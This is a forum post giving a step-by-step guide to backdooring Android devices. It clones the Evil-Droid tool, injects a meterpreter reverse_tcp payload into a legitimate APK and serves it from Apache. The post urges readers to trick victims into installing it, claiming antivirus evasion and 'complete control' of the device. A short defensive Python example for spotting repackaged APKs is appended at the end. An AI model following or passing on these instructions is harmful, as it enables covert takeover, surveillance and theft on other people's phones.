There was an Android hacking technique which I posted here in this forum recently, using Metasploit and having a backdoor installed on the Android device. Now some people lashed back at me about how noob the trick is (according to him), that it doesn't bypass antivirus, and that the trick is old, as he said.
So, here is the ultimate guide to hacking any Android device using the same backdoor technique, but the process is totally automatic, so it's user-friendly. Don't think that it doesn't work because it's an easy technique; only the automation of the process made it so.
You may be able to automatically embed payloads or your RATs in the original APK file, which you send as a trusted application to the client. You will mask the RAT as some useful app and make them install it, and the system cannot detect it as harmful because, well, the original APK file is still usable and the backdoor is completely hidden.
The author does not hold any responsibility for the bad use of this tool; remember, this is only for educational purposes.
Things you need:
A Linux machine (if you don't have one, I think you should. Totally recommended)
All other dependencies will be automatically installed when you run this tool.
On the terminal:
- Install the tool by:
git clone https://github.com/M4sc3r4n0/Evil-Droid.git
- Set script execution permissions (chmod it):
chmod +x evil-droid
- run by
Once you run it, it will automatically install all the dependencies you need. Wait a while and allow the framework to execute.
- Select the 3rd option, where you need to install for new APK files which are coded latest.
- Set your LHOST (your IP)
- Set the port to a default like 1234
- Set whatever name you want for the APK.
- Select android/meterpreter/reverse_tcp
- This section is where you will select the original APK to inject the payload into. It may be any app, like launchers or Google apps; I think you get me. Select that.
- Select Multi handler
- That's it!! The APK will be saved and is ready to be transferred to your victim.
- Transfer this file to /var/www/html
- Start the apache2 server
ON VICTIM DEVICE
- Enter your LHOST into the URL bar and download the file remotely from the server and make your victim install that file
- You can do that yourself or you make your victim do that.
/// Some users DM'ed me that the backdoor still needs to be installed and this is not a hack. Well, good luck to you guys.
- After installation, a reverse shell is already made to your Linux system.
ON HACKING MACHINE
You will use general Metasploit commands to run the handler and take control of the Android device. I mean complete control of the device.
You can refer to my other Android hacking thread for reference of commands to make the payload run.
That's about the complete hack of the Android device. We went from creating a custom backdoor or payload to injecting it into the original APK file and making the victim install it, bypassing all the antivirus hassles. As there is a real app embedded, there is literally less chance that the victim will uninstall the APK file.
This is the ultimate way to hack any Android device, and it works almost one hundred percent of the time.
Use common sense to get out of situations where you are stuck. I'm here to help you.
With power comes great responsibility.
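From the defender's side, the repackaging described above leaves traces: changing an APK's contents invalidates the original signature, so the file has to be signed again. The following added example (not part of the original post or of the Evil-Droid project) diffs a suspect APK against the publisher's release of the same version. The function names and sample archives are constructed for illustration, and it inspects zip entries only, so v2+ signing blocks are out of scope.

```python
import hashlib
import io
import zipfile

def entry_hashes(apk_bytes):
    """SHA-256 of each zip entry's uncompressed content, keyed by name."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        return {n: hashlib.sha256(z.read(n)).hexdigest() for n in z.namelist()}

def diff_against_reference(reference, suspect):
    """Compare a suspect APK with the publisher's release of the same version."""
    ref, sus = entry_hashes(reference), entry_hashes(suspect)
    added = sorted(sus.keys() - ref.keys())
    removed = sorted(ref.keys() - sus.keys())
    changed = sorted(n for n in ref.keys() & sus.keys() if ref[n] != sus[n])
    touched = changed + added + removed
    return {
        "added": added, "removed": removed, "changed": changed,
        # v1 (JAR) signature files live under META-INF/; a difference there
        # means the archive was signed again after the reference was built.
        "resigned": any(n.startswith("META-INF/") for n in touched),
        # Executable code and the manifest are where injected components land.
        "code_touched": [n for n in changed + added
                         if n.endswith(".dex") or n == "AndroidManifest.xml"],
    }

def is_tampered(report):
    return bool(report["added"] or report["removed"] or report["changed"])

def build_sample(entries):
    """Build a constructed zip standing in for an APK (not a real app)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in entries.items():
            z.writestr(name, data)
    return buf.getvalue()

# Constructed sample data: placeholder bytes, not real DEX or certificates.
BASE = {"AndroidManifest.xml": b"manifest", "classes.dex": b"app-code",
        "res/icon.png": b"icon", "META-INF/CERT.RSA": b"publisher-signature"}
GENUINE = build_sample(BASE)
REPACKAGED = build_sample({**BASE, "AndroidManifest.xml": b"manifest-modified",
                           "classes2.dex": b"extra-code",
                           "META-INF/CERT.RSA": b"other-signature"})

if __name__ == "__main__":
    print(diff_against_reference(GENUINE, REPACKAGED))
```

For real files, `apksigner verify --print-certs` from the Android SDK build tools prints the signer certificate, which should match the publisher's.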